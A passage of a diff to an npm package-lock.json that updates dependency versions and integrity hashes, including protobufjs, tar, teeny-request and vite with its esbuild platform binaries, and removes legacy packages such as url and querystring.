"sha512-cbrerZV+6rvdQrrD+iGMcZFEiiSrbv9Tfdkvnusy6y0x0GKBXREFg/Y65GhIfm0tnLntThhzCnfKwp1WRjeCyQ==", "funding": [ { "type": "github", @@ -22594,6 +22312,12 @@ "node": ">=18" } }, + "node_modules/probot/node_modules/@octokit/openapi-types": { + "version": "24.2.0", + "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-24.2.0.tgz", + "integrity": "sha512-9sIH3nSUttelJSXUrmGzl7QUBFul0/mB8HRYl3fOlgHbIWG+WnYDXU3v/2zMtAvuzZ/ed00Ei6on975FhBfzrg==", + "license": "MIT" + }, "node_modules/probot/node_modules/@octokit/plugin-retry": { "version": "6.0.1", "resolved": "https://registry.npmjs.org/@octokit/plugin-retry/-/plugin-retry-6.0.1.tgz", @@ -22626,6 +22350,29 @@ "@octokit/core": "^5.0.0" } }, + "node_modules/probot/node_modules/@octokit/request-error": { + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-5.1.1.tgz", + "integrity": "sha512-v9iyEQJH6ZntoENr9/yXxjuezh4My67CBSu9r6Ve/05Iu5gNgnisNWOsoJHTP6k0Rr0+HQIpnH+kyammu90q/g==", + "license": "MIT", + "dependencies": { + "@octokit/types": "^13.1.0", + "deprecation": "^2.0.0", + "once": "^1.4.0" + }, + "engines": { + "node": ">= 18" + } + }, + "node_modules/probot/node_modules/@octokit/request-error/node_modules/@octokit/types": { + "version": "13.10.0", + "resolved": "https://registry.npmjs.org/@octokit/types/-/types-13.10.0.tgz", + "integrity": "sha512-ifLaO34EbbPj0Xgro4G5lP5asESjwHracYJvVaPIyXMuiuXLlhic3S47cBdTb+jfODkTE5YtGCLt3Ay3+J97sA==", + "license": "MIT", + "dependencies": { + "@octokit/openapi-types": "^24.2.0" + } + }, "node_modules/probot/node_modules/commander": { "version": "12.1.0", "resolved": "https://registry.npmjs.org/commander/-/commander-12.1.0.tgz", @@ -22782,22 +22529,23 @@ } }, "node_modules/proto3-json-serializer": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/proto3-json-serializer/-/proto3-json-serializer-2.0.2.tgz", - "integrity": 
"sha512-SAzp/O4Yh02jGdRc+uIrGoe87dkN/XtwxfZ4ZyafJHymd79ozp5VG5nyZ7ygqPM5+cpLDjjGnYFUkngonyDPOQ==", + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/proto3-json-serializer/-/proto3-json-serializer-3.0.4.tgz", + "integrity": "sha512-E1sbAYg3aEbXrq0n1ojJkRHQJGE1kaE/O6GLA94y8rnJBfgvOPTOd1b9hOceQK1FFZI9qMh1vBERCyO2ifubcw==", "license": "Apache-2.0", "dependencies": { - "protobufjs": "^7.2.5" + "protobufjs": "^7.4.0" }, "engines": { - "node": ">=14.0.0" + "node": ">=18" } }, "node_modules/protobufjs": { - "version": "7.4.0", - "resolved": "https://registry.npmjs.org/protobufjs/-/protobufjs-7.4.0.tgz", - "integrity": "sha512-mRUWCc3KUU4w1jU8sGxICXH/gNS94DvI1gxqDvBzhj1JpcsimQkYiOJfwsPUykUI5ZaspFbSgmBLER8IrQ3tqw==", + "version": "7.5.4", + "resolved": "https://registry.npmjs.org/protobufjs/-/protobufjs-7.5.4.tgz", + "integrity": "sha512-CvexbZtbov6jW2eXAvLukXjXUW1TzFaivC46BpWc/3BpcCysb5Vffu+B3XHMm8lVEuy2Mm4XGex8hBSg1yapPg==", "hasInstallScript": true, + "license": "BSD-3-Clause", "dependencies": { "@protobufjs/aspromise": "^1.1.2", "@protobufjs/base64": "^1.1.2", @@ -22892,15 +22640,6 @@ "url": "https://github.com/sponsors/ljharb" } }, - "node_modules/querystring": { - "version": "0.2.0", - "resolved": "https://registry.npmjs.org/querystring/-/querystring-0.2.0.tgz", - "integrity": "sha512-X/xY82scca2tau62i9mDyU9K+I+djTMUsvwf7xnUX5GLvVzgJybOJf4Y6o9Zx3oJK/LSXg5tTZBjwzqVPaPO2g==", - "deprecated": "The querystring API is considered Legacy. 
new code should use the URLSearchParams API instead.", - "engines": { - "node": ">=0.4.x" - } - }, "node_modules/queue-lit": { "version": "1.5.2", "resolved": "https://registry.npmjs.org/queue-lit/-/queue-lit-1.5.2.tgz", @@ -23275,16 +23014,6 @@ "url": "https://github.com/sponsors/isaacs" } }, - "node_modules/react-email/node_modules/minipass": { - "version": "7.1.2", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.2.tgz", - "integrity": "sha512-qOOzS1cBTWYF4BH8fVePDBOO9iptMnGUEZwNc/cMWnTV2nVLZ7VoNWEPHkYczZA0pdoA7dl6e7FL659nX9S2aw==", - "dev": true, - "license": "ISC", - "engines": { - "node": ">=16 || 14 >=14.17" - } - }, "node_modules/react-email/node_modules/onetime": { "version": "7.0.0", "resolved": "https://registry.npmjs.org/onetime/-/onetime-7.0.0.tgz", @@ -23625,6 +23354,7 @@ "version": "2.1.1", "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", + "license": "MIT", "engines": { "node": ">=0.10.0" } @@ -23700,22 +23430,6 @@ "url": "https://github.com/privatenumber/resolve-pkg-maps?sponsor=1" } }, - "node_modules/restore-cursor": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/restore-cursor/-/restore-cursor-4.0.0.tgz", - "integrity": "sha512-I9fPXU9geO9bHOt9pHHOhOkYerIMsmVaWB0rA2AI9ERh/+x/i7MV5HKBNrg+ljO5eoPVgCcnFuRjJ9uH6I/3eg==", - "dev": true, - "dependencies": { - "onetime": "^5.1.0", - "signal-exit": "^3.0.2" - }, - "engines": { - "node": "^12.20.0 || ^14.13.1 || >=16.0.0" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, "node_modules/ret": { "version": "0.4.3", "resolved": "https://registry.npmjs.org/ret/-/ret-0.4.3.tgz", @@ -23734,17 +23448,16 @@ } }, "node_modules/retry-request": { - "version": "7.0.2", - "resolved": "https://registry.npmjs.org/retry-request/-/retry-request-7.0.2.tgz", - "integrity": 
"sha512-dUOvLMJ0/JJYEn8NrpOaGNE7X3vpI5XlZS/u0ANjqtcZVKnIxP7IgCFwrKTxENw29emmwug53awKtaMm4i9g5w==", + "version": "8.0.2", + "resolved": "https://registry.npmjs.org/retry-request/-/retry-request-8.0.2.tgz", + "integrity": "sha512-JzFPAfklk1kjR1w76f0QOIhoDkNkSqW8wYKT08n9yysTmZfB+RQ2QoXoTAeOi1HD9ZipTyTAZg3c4pM/jeqgSw==", "license": "MIT", "dependencies": { - "@types/request": "^2.48.8", "extend": "^3.0.2", - "teeny-request": "^9.0.0" + "teeny-request": "^10.0.0" }, "engines": { - "node": ">=14" + "node": ">=18" } }, "node_modules/reusify": { @@ -23970,6 +23683,7 @@ "version": "1.1.0", "resolved": "https://registry.npmjs.org/safe-regex-test/-/safe-regex-test-1.1.0.tgz", "integrity": "sha512-x/+Cz4YrimQxQccJf5mKEbIa1NzeCRNI5Ecl/ekmlYaampdNLPalVyIcCZNNH3MvmqBugV5TMYZXv0ljslUlaw==", + "dev": true, "license": "MIT", "dependencies": { "call-bound": "^1.0.2", @@ -24971,15 +24685,6 @@ "node": "^20.17.0 || >=22.9.0" } }, - "node_modules/ssri/node_modules/minipass": { - "version": "7.1.3", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.3.tgz", - "integrity": "sha512-tEBHqDnIoM/1rXME1zgka9g6Q2lcoCkxHLuc7ODJ5BxbP5d4c2Z5cGgtXAku59200Cx7diuHTOYfSBD8n6mm8A==", - "license": "BlueOak-1.0.0", - "engines": { - "node": ">=16 || 14 >=14.17" - } - }, "node_modules/stack-trace": { "version": "0.0.10", "resolved": "https://registry.npmjs.org/stack-trace/-/stack-trace-0.0.10.tgz", @@ -25016,21 +24721,6 @@ "dev": true, "license": "MIT" }, - "node_modules/stdin-discarder": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/stdin-discarder/-/stdin-discarder-0.1.0.tgz", - "integrity": "sha512-xhV7w8S+bUwlPTb4bAOUQhv8/cSS5offJuX8GQGq32ONF0ZtDWKfkdomM3HMRA+LhX6um/FZ0COqlwsjD53LeQ==", - "dev": true, - "dependencies": { - "bl": "^5.0.0" - }, - "engines": { - "node": "^12.20.0 || ^14.13.1 || >=16.0.0" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, "node_modules/stream-events": { "version": "1.0.5", "resolved": 
"https://registry.npmjs.org/stream-events/-/stream-events-1.0.5.tgz", @@ -25069,23 +24759,6 @@ "safe-buffer": "~5.2.0" } }, - "node_modules/string-width": { - "version": "6.1.0", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-6.1.0.tgz", - "integrity": "sha512-k01swCJAgQmuADB0YIc+7TuatfNvTBVOoaUWJjTB9R4VJzR5vNWzf5t42ESVZFPS8xTySF7CAdV4t/aaIm3UnQ==", - "dev": true, - "dependencies": { - "eastasianwidth": "^0.2.0", - "emoji-regex": "^10.2.1", - "strip-ansi": "^7.0.1" - }, - "engines": { - "node": ">=16" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, "node_modules/string-width-cjs": { "name": "string-width", "version": "4.2.3", @@ -25243,9 +24916,9 @@ "license": "MIT" }, "node_modules/strnum": { - "version": "2.2.2", - "resolved": "https://registry.npmjs.org/strnum/-/strnum-2.2.2.tgz", - "integrity": "sha512-DnR90I+jtXNSTXWdwrEy9FakW7UX+qUZg28gj5fk2vxxl7uS/3bpI4fjFYVmdK9etptYBPNkpahuQnEwhwECqA==", + "version": "2.2.3", + "resolved": "https://registry.npmjs.org/strnum/-/strnum-2.2.3.tgz", + "integrity": "sha512-oKx6RUCuHfT3oyVjtnrmn19H1SiCqgJSg+54XqURKp5aCMbrXrhLjRN9TjuwMjiYstZ0MzDrHqkGZ5dFTKd+zg==", "funding": [ { "type": "github", @@ -25439,19 +25112,28 @@ } }, "node_modules/tar": { - "version": "6.2.1", - "resolved": "https://registry.npmjs.org/tar/-/tar-6.2.1.tgz", - "integrity": "sha512-DZ4yORTwrbTj/7MZYq2w+/ZFdI6OZ/f9SFHR+71gIVUZhOQPHzVCLpvRnPgyaMpfWxxk/4ONva3GQSyNIKRv6A==", - "dependencies": { - "chownr": "^2.0.0", - "fs-minipass": "^2.0.0", - "minipass": "^5.0.0", - "minizlib": "^2.1.1", - "mkdirp": "^1.0.3", - "yallist": "^4.0.0" + "version": "7.5.13", + "resolved": "https://registry.npmjs.org/tar/-/tar-7.5.13.tgz", + "integrity": "sha512-tOG/7GyXpFevhXVh8jOPJrmtRpOTsYqUIkVdVooZYJS/z8WhfQUX8RJILmeuJNinGAMSu1veBr4asSHFt5/hng==", + "license": "BlueOak-1.0.0", + "dependencies": { + "@isaacs/fs-minipass": "^4.0.0", + "chownr": "^3.0.0", + "minipass": "^7.1.2", + "minizlib": "^3.1.0", + "yallist": "^5.0.0" }, 
"engines": { - "node": ">=10" + "node": ">=18" + } + }, + "node_modules/tar/node_modules/yallist": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-5.0.0.tgz", + "integrity": "sha512-YgvUTfwqyc7UXVMrB+SImsVYSmTS8X/tSrtdNZMImM+n7+QTriRXyXim0mBrTXNeqzVF0KWGgHPeiyViFFrNDw==", + "license": "BlueOak-1.0.0", + "engines": { + "node": ">=18" } }, "node_modules/tarn": { @@ -25493,25 +25175,33 @@ } }, "node_modules/teeny-request": { - "version": "9.0.0", - "resolved": "https://registry.npmjs.org/teeny-request/-/teeny-request-9.0.0.tgz", - "integrity": "sha512-resvxdc6Mgb7YEThw6G6bExlXKkv6+YbuzGg9xuXxSgxJF7Ozs+o8Y9+2R3sArdWdW8nOokoQb1yrpFB0pQK2g==", + "version": "10.1.2", + "resolved": "https://registry.npmjs.org/teeny-request/-/teeny-request-10.1.2.tgz", + "integrity": "sha512-Xj0ZAQ0CeuQn6UxCDPLbFRlgcSTUEyO3+wiepr2grjIjyL/lMMs1Z4OwXn8kLvn/V1OuaEP0UY7Na6UDNNsYrQ==", "license": "Apache-2.0", "dependencies": { - "http-proxy-agent": "^5.0.0", - "https-proxy-agent": "^5.0.0", - "node-fetch": "^2.6.9", - "stream-events": "^1.0.5", - "uuid": "^9.0.0" + "http-proxy-agent": "^7.0.0", + "https-proxy-agent": "^7.0.1", + "node-fetch": "^3.3.2", + "stream-events": "^1.0.5" }, "engines": { - "node": ">=14" + "node": ">=18" + } + }, + "node_modules/teeny-request/node_modules/agent-base": { + "version": "7.1.4", + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-7.1.4.tgz", + "integrity": "sha512-MnA+YT8fwfJPgBx3m60MNqakm30XOkyIoH1y6huTQvC0PwZG7ki8NacLBcrPbNoo8vEZy7Jpuk7+jMO+CUovTQ==", + "license": "MIT", + "engines": { + "node": ">= 14" } }, "node_modules/teeny-request/node_modules/debug": { - "version": "4.3.7", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.7.tgz", - "integrity": "sha512-Er2nc/H7RrMXZBFCEim6TCmMk02Z8vLC2Rbi1KEBggpo0fS6l0S1nnapwmIi3yW/+GOJap1Krg4w0Hg80oCqgQ==", + "version": "4.4.3", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.3.tgz", + "integrity": 
"sha512-RGwwWnwQvkVfavKVt22FGLw+xYSdzARwm0ru6DhTVA3umU5hZc28V3kO4stgYryrTlLpuvgI9GiijltAjNbcqA==", "license": "MIT", "dependencies": { "ms": "^2.1.3" @@ -25525,31 +25215,35 @@ } } }, - "node_modules/teeny-request/node_modules/http-proxy-agent": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/http-proxy-agent/-/http-proxy-agent-5.0.0.tgz", - "integrity": "sha512-n2hY8YdoRE1i7r6M0w9DIw5GgZN0G25P8zLCRQ8rjXtTU3vsNFBI/vWK/UIeE6g5MUUz6avwAPXmL6Fy9D/90w==", + "node_modules/teeny-request/node_modules/https-proxy-agent": { + "version": "7.0.6", + "resolved": "https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-7.0.6.tgz", + "integrity": "sha512-vK9P5/iUfdl95AI+JVyUuIcVtd4ofvtrOr3HNtM2yxC9bnMbEdp3x01OhQNnjb8IJYi38VlTE3mBXwcfvywuSw==", "license": "MIT", "dependencies": { - "@tootallnate/once": "2", - "agent-base": "6", + "agent-base": "^7.1.2", "debug": "4" }, "engines": { - "node": ">= 6" + "node": ">= 14" } }, - "node_modules/teeny-request/node_modules/uuid": { - "version": "9.0.1", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-9.0.1.tgz", - "integrity": "sha512-b+1eJOlsR9K8HJpow9Ok3fiWOWSIcIzXodvv0rQjVoOVNpWMpxf1wZNpt4y9h10odCNrqnYp1OBzRktckBe3sA==", - "funding": [ - "https://github.com/sponsors/broofa", - "https://github.com/sponsors/ctavan" - ], + "node_modules/teeny-request/node_modules/node-fetch": { + "version": "3.3.2", + "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-3.3.2.tgz", + "integrity": "sha512-dRB78srN/l6gqWulah9SrxeYnxeddIG30+GOqK/9OlLVyLg3HPnr6SqOWTWOXKRwC2eGYCkZ59NNuSgvSrpgOA==", "license": "MIT", - "bin": { - "uuid": "dist/bin/uuid" + "dependencies": { + "data-uri-to-buffer": "^4.0.0", + "fetch-blob": "^3.1.4", + "formdata-polyfill": "^4.0.10" + }, + "engines": { + "node": "^12.20.0 || ^14.13.1 || >=16.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/node-fetch" } }, "node_modules/text-hex": { @@ -26534,35 +26228,6 @@ "integrity": 
"sha512-HXgFDgDommxn5/bIv0cnQZsPhHDA90NPHD6+c/v21U5+Sx5hoP8+dP9IZXBU1gIfvdRfhG8cel9QNPeionfcCQ==", "license": "MIT" }, - "node_modules/url": { - "version": "0.10.3", - "resolved": "https://registry.npmjs.org/url/-/url-0.10.3.tgz", - "integrity": "sha512-hzSUW2q06EqL1gKM/a+obYHLIO6ct2hwPuviqTTOcfFVc61UbfJ2Q32+uGL/HCPxKqrdGB5QUwIe7UqlDgwsOQ==", - "license": "MIT", - "dependencies": { - "punycode": "1.3.2", - "querystring": "0.2.0" - } - }, - "node_modules/url/node_modules/punycode": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/punycode/-/punycode-1.3.2.tgz", - "integrity": "sha512-RofWgt/7fL5wP1Y7fxE7/EmTLzQVnB0ycyibJ0OOHIlJqTNzglYFxVwETOcIoJqJmpDXJ9xImDv+Fq34F/d4Dw==", - "license": "MIT" - }, - "node_modules/util": { - "version": "0.12.5", - "resolved": "https://registry.npmjs.org/util/-/util-0.12.5.tgz", - "integrity": "sha512-kZf/K6hEIrWHI6XqOFUiiMa+79wE/D8Q+NCNAWclkyg3b4d2k7s0QGepNjiABc+aR3N1PAyHL7p6UcLY6LmrnA==", - "license": "MIT", - "dependencies": { - "inherits": "^2.0.3", - "is-arguments": "^1.0.4", - "is-generator-function": "^1.0.7", - "is-typed-array": "^1.1.3", - "which-typed-array": "^1.1.2" - } - }, "node_modules/util-deprecate": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", @@ -26650,68 +26315,14 @@ "node": ">=0.6.0" } }, - "node_modules/vite-node": { - "version": "3.2.4", - "resolved": "https://registry.npmjs.org/vite-node/-/vite-node-3.2.4.tgz", - "integrity": "sha512-EbKSKh+bh1E1IFxeO0pg1n4dvoOTt0UDiXMd/qn++r98+jPO1xtJilvXldeuQ8giIB5IkpjCgMleHMNEsGH6pg==", - "dev": true, - "license": "MIT", - "dependencies": { - "cac": "^6.7.14", - "debug": "^4.4.1", - "es-module-lexer": "^1.7.0", - "pathe": "^2.0.3", - "vite": "^5.0.0 || ^6.0.0 || ^7.0.0-0" - }, - "bin": { - "vite-node": "vite-node.mjs" - }, - "engines": { - "node": "^18.0.0 || ^20.0.0 || >=22.0.0" - }, - "funding": { - "url": "https://opencollective.com/vitest" - } - }, - "node_modules/vite-node/node_modules/debug": 
{ - "version": "4.4.3", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.3.tgz", - "integrity": "sha512-RGwwWnwQvkVfavKVt22FGLw+xYSdzARwm0ru6DhTVA3umU5hZc28V3kO4stgYryrTlLpuvgI9GiijltAjNbcqA==", - "dev": true, - "license": "MIT", - "dependencies": { - "ms": "^2.1.3" - }, - "engines": { - "node": ">=6.0" - }, - "peerDependenciesMeta": { - "supports-color": { - "optional": true - } - } - }, - "node_modules/vite-node/node_modules/picomatch": { - "version": "4.0.4", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-4.0.4.tgz", - "integrity": "sha512-QP88BAKvMam/3NxH6vj2o21R6MjxZUAd6nlwAS/pnGvN9IVLocLHxGYIzFhg6fUQ+5th6P4dv4eW9jX3DSIj7A==", - "dev": true, - "license": "MIT", - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/sponsors/jonschlinkert" - } - }, - "node_modules/vite-node/node_modules/vite": { - "version": "7.1.12", - "resolved": "https://registry.npmjs.org/vite/-/vite-7.1.12.tgz", - "integrity": "sha512-ZWyE8YXEXqJrrSLvYgrRP7p62OziLW7xI5HYGWFzOvupfAlrLvURSzv/FyGyy0eidogEM3ujU+kUG1zuHgb6Ug==", + "node_modules/vite": { + "version": "7.3.2", + "resolved": "https://registry.npmjs.org/vite/-/vite-7.3.2.tgz", + "integrity": "sha512-Bby3NOsna2jsjfLVOHKes8sGwgl4TT0E6vvpYgnAYDIF/tie7MRaFthmKuHx1NSXjiTueXH3do80FMQgvEktRg==", "dev": true, "license": "MIT", "dependencies": { - "esbuild": "^0.25.0", + "esbuild": "^0.27.0", "fdir": "^6.5.0", "picomatch": "^4.0.3", "postcss": "^8.5.6", @@ -26779,107 +26390,30 @@ } } }, - "node_modules/vitest": { + "node_modules/vite-node": { "version": "3.2.4", - "resolved": "https://registry.npmjs.org/vitest/-/vitest-3.2.4.tgz", - "integrity": "sha512-LUCP5ev3GURDysTWiP47wRRUpLKMOfPh+yKTx3kVIEiu5KOMeqzpnYNsKyOoVrULivR8tLcks4+lga33Whn90A==", + "resolved": "https://registry.npmjs.org/vite-node/-/vite-node-3.2.4.tgz", + "integrity": "sha512-EbKSKh+bh1E1IFxeO0pg1n4dvoOTt0UDiXMd/qn++r98+jPO1xtJilvXldeuQ8giIB5IkpjCgMleHMNEsGH6pg==", "dev": true, "license": "MIT", "dependencies": { - 
"@types/chai": "^5.2.2", - "@vitest/expect": "3.2.4", - "@vitest/mocker": "3.2.4", - "@vitest/pretty-format": "^3.2.4", - "@vitest/runner": "3.2.4", - "@vitest/snapshot": "3.2.4", - "@vitest/spy": "3.2.4", - "@vitest/utils": "3.2.4", - "chai": "^5.2.0", + "cac": "^6.7.14", "debug": "^4.4.1", - "expect-type": "^1.2.1", - "magic-string": "^0.30.17", + "es-module-lexer": "^1.7.0", "pathe": "^2.0.3", - "picomatch": "^4.0.2", - "std-env": "^3.9.0", - "tinybench": "^2.9.0", - "tinyexec": "^0.3.2", - "tinyglobby": "^0.2.14", - "tinypool": "^1.1.1", - "tinyrainbow": "^2.0.0", - "vite": "^5.0.0 || ^6.0.0 || ^7.0.0-0", - "vite-node": "3.2.4", - "why-is-node-running": "^2.3.0" + "vite": "^5.0.0 || ^6.0.0 || ^7.0.0-0" }, "bin": { - "vitest": "vitest.mjs" + "vite-node": "vite-node.mjs" }, "engines": { "node": "^18.0.0 || ^20.0.0 || >=22.0.0" }, "funding": { "url": "https://opencollective.com/vitest" - }, - "peerDependencies": { - "@edge-runtime/vm": "*", - "@types/debug": "^4.1.12", - "@types/node": "^18.0.0 || ^20.0.0 || >=22.0.0", - "@vitest/browser": "3.2.4", - "@vitest/ui": "3.2.4", - "happy-dom": "*", - "jsdom": "*" - }, - "peerDependenciesMeta": { - "@edge-runtime/vm": { - "optional": true - }, - "@types/debug": { - "optional": true - }, - "@types/node": { - "optional": true - }, - "@vitest/browser": { - "optional": true - }, - "@vitest/ui": { - "optional": true - }, - "happy-dom": { - "optional": true - }, - "jsdom": { - "optional": true - } - } - }, - "node_modules/vitest/node_modules/@vitest/mocker": { - "version": "3.2.4", - "resolved": "https://registry.npmjs.org/@vitest/mocker/-/mocker-3.2.4.tgz", - "integrity": "sha512-46ryTE9RZO/rfDd7pEqFl7etuyzekzEhUbTW3BvmeO/BcCMEgq59BKhek3dXDWgAj4oMK6OZi+vRr1wPW6qjEQ==", - "dev": true, - "license": "MIT", - "dependencies": { - "@vitest/spy": "3.2.4", - "estree-walker": "^3.0.3", - "magic-string": "^0.30.17" - }, - "funding": { - "url": "https://opencollective.com/vitest" - }, - "peerDependencies": { - "msw": "^2.4.9", - "vite": 
"^5.0.0 || ^6.0.0 || ^7.0.0-0" - }, - "peerDependenciesMeta": { - "msw": { - "optional": true - }, - "vite": { - "optional": true - } } }, - "node_modules/vitest/node_modules/debug": { + "node_modules/vite-node/node_modules/debug": { "version": "4.4.3", "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.3.tgz", "integrity": "sha512-RGwwWnwQvkVfavKVt22FGLw+xYSdzARwm0ru6DhTVA3umU5hZc28V3kO4stgYryrTlLpuvgI9GiijltAjNbcqA==", @@ -26897,94 +26431,634 @@ } } }, - "node_modules/vitest/node_modules/picomatch": { - "version": "4.0.4", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-4.0.4.tgz", - "integrity": "sha512-QP88BAKvMam/3NxH6vj2o21R6MjxZUAd6nlwAS/pnGvN9IVLocLHxGYIzFhg6fUQ+5th6P4dv4eW9jX3DSIj7A==", + "node_modules/vite/node_modules/@esbuild/aix-ppc64": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/aix-ppc64/-/aix-ppc64-0.27.7.tgz", + "integrity": "sha512-EKX3Qwmhz1eMdEJokhALr0YiD0lhQNwDqkPYyPhiSwKrh7/4KRjQc04sZ8db+5DVVnZ1LmbNDI1uAMPEUBnQPg==", + "cpu": [ + "ppc64" + ], "dev": true, "license": "MIT", + "optional": true, + "os": [ + "aix" + ], "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/sponsors/jonschlinkert" + "node": ">=18" } }, - "node_modules/vitest/node_modules/vite": { - "version": "7.1.12", - "resolved": "https://registry.npmjs.org/vite/-/vite-7.1.12.tgz", - "integrity": "sha512-ZWyE8YXEXqJrrSLvYgrRP7p62OziLW7xI5HYGWFzOvupfAlrLvURSzv/FyGyy0eidogEM3ujU+kUG1zuHgb6Ug==", + "node_modules/vite/node_modules/@esbuild/android-arm": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/android-arm/-/android-arm-0.27.7.tgz", + "integrity": "sha512-jbPXvB4Yj2yBV7HUfE2KHe4GJX51QplCN1pGbYjvsyCZbQmies29EoJbkEc+vYuU5o45AfQn37vZlyXy4YJ8RQ==", + "cpu": [ + "arm" + ], "dev": true, "license": "MIT", - "dependencies": { - "esbuild": "^0.25.0", - "fdir": "^6.5.0", - "picomatch": "^4.0.3", - "postcss": "^8.5.6", - "rollup": "^4.43.0", - "tinyglobby": "^0.2.15" - }, - "bin": { 
- "vite": "bin/vite.js" - }, + "optional": true, + "os": [ + "android" + ], "engines": { - "node": "^20.19.0 || >=22.12.0" - }, - "funding": { - "url": "https://github.com/vitejs/vite?sponsor=1" - }, - "optionalDependencies": { - "fsevents": "~2.3.3" - }, - "peerDependencies": { - "@types/node": "^20.19.0 || >=22.12.0", - "jiti": ">=1.21.0", - "less": "^4.0.0", - "lightningcss": "^1.21.0", - "sass": "^1.70.0", - "sass-embedded": "^1.70.0", - "stylus": ">=0.54.8", - "sugarss": "^5.0.0", - "terser": "^5.16.0", - "tsx": "^4.8.1", - "yaml": "^2.4.2" - }, - "peerDependenciesMeta": { - "@types/node": { - "optional": true - }, - "jiti": { - "optional": true - }, - "less": { - "optional": true - }, - "lightningcss": { - "optional": true - }, - "sass": { - "optional": true - }, - "sass-embedded": { - "optional": true - }, - "stylus": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/android-arm64": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/android-arm64/-/android-arm64-0.27.7.tgz", + "integrity": "sha512-62dPZHpIXzvChfvfLJow3q5dDtiNMkwiRzPylSCfriLvZeq0a1bWChrGx/BbUbPwOrsWKMn8idSllklzBy+dgQ==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "android" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/android-x64": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/android-x64/-/android-x64-0.27.7.tgz", + "integrity": "sha512-x5VpMODneVDb70PYV2VQOmIUUiBtY3D3mPBG8NxVk5CogneYhkR7MmM3yR/uMdITLrC1ml/NV1rj4bMJuy9MCg==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "android" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/darwin-arm64": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/darwin-arm64/-/darwin-arm64-0.27.7.tgz", + "integrity": 
"sha512-5lckdqeuBPlKUwvoCXIgI2D9/ABmPq3Rdp7IfL70393YgaASt7tbju3Ac+ePVi3KDH6N2RqePfHnXkaDtY9fkw==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/darwin-x64": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/darwin-x64/-/darwin-x64-0.27.7.tgz", + "integrity": "sha512-rYnXrKcXuT7Z+WL5K980jVFdvVKhCHhUwid+dDYQpH+qu+TefcomiMAJpIiC2EM3Rjtq0sO3StMV/+3w3MyyqQ==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/freebsd-arm64": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/freebsd-arm64/-/freebsd-arm64-0.27.7.tgz", + "integrity": "sha512-B48PqeCsEgOtzME2GbNM2roU29AMTuOIN91dsMO30t+Ydis3z/3Ngoj5hhnsOSSwNzS+6JppqWsuhTp6E82l2w==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "freebsd" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/freebsd-x64": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/freebsd-x64/-/freebsd-x64-0.27.7.tgz", + "integrity": "sha512-jOBDK5XEjA4m5IJK3bpAQF9/Lelu/Z9ZcdhTRLf4cajlB+8VEhFFRjWgfy3M1O4rO2GQ/b2dLwCUGpiF/eATNQ==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "freebsd" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/linux-arm": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/linux-arm/-/linux-arm-0.27.7.tgz", + "integrity": 